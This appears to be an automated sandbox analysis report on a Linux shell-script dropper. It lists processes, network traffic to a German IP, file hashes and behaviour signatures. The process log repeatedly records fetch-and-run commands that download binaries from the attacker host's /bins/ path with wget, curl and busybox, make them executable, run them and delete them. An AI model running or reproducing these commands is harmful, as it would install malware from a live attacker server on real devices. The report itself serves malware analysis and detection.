/usr/bin/wget

[wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/bin/chmod

[chmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL

[./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/bin/rm

[rm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/usr/bin/wget

[wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/bin/chmod

[chmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0

[./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/bin/rm

[rm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/usr/bin/wget

[wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/bin/chmod

[chmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD

[./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/bin/rm

[rm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/usr/bin/wget

[wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/bin/chmod

[chmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA

[./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/bin/rm

[rm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/usr/bin/wget

[wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/bin/chmod

[chmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW

[./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/bin/rm

[rm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/usr/bin/wget

[wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/chmod

[chmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq

[./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/rm

[rm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/usr/bin/wget

[wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/bin/chmod

[chmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z

[./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/bin/rm

[rm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/usr/bin/wget

[wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/bin/chmod

[chmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5

[./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/bin/rm

[rm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/usr/bin/wget

[wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/bin/chmod

[chmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K

[./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/bin/rm

[rm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/usr/bin/wget

[wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/bin/chmod

[chmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg

[./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/bin/rm

[rm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/usr/bin/wget

[wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/bin/chmod

[chmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9

[./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/bin/rm

[rm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/usr/bin/wget

[wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/bin/chmod

[chmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV

[./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/bin/rm

[rm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/usr/bin/wget

[wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/bin/chmod

[chmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq

[./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/bin/rm

[rm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/usr/bin/wget

[wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/bin/chmod

[chmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4

[./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/bin/rm

[rm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/usr/bin/wget

[wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/bin/chmod

[chmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW

[./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/bin/rm

[rm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/usr/bin/wget

[wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/bin/chmod

[chmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL

[./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/bin/rm

[rm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/usr/bin/wget

[wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/bin/chmod

[chmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0

[./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/bin/rm

[rm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/usr/bin/wget

[wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/bin/chmod

[chmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD

[./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/bin/rm

[rm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/usr/bin/wget

[wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/bin/chmod

[chmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA

[./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/bin/rm

[rm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
N/A 224.0.0.251:5353 udp
US 151.101.65.91:443 tcp
GB 195.181.164.19:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 185.125.188.61:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 185.125.188.61:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-18 01:49

Reported

2024-10-18 01:52

Platform

debian9-armhf-20240611-en

Max time kernel

2s

Max time network

4s

Command Line

[/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /usr/bin/curl N/A

Processes

/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh

[/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/chmod

[chmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq

[./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/rm

[rm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/usr/bin/wget

[wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97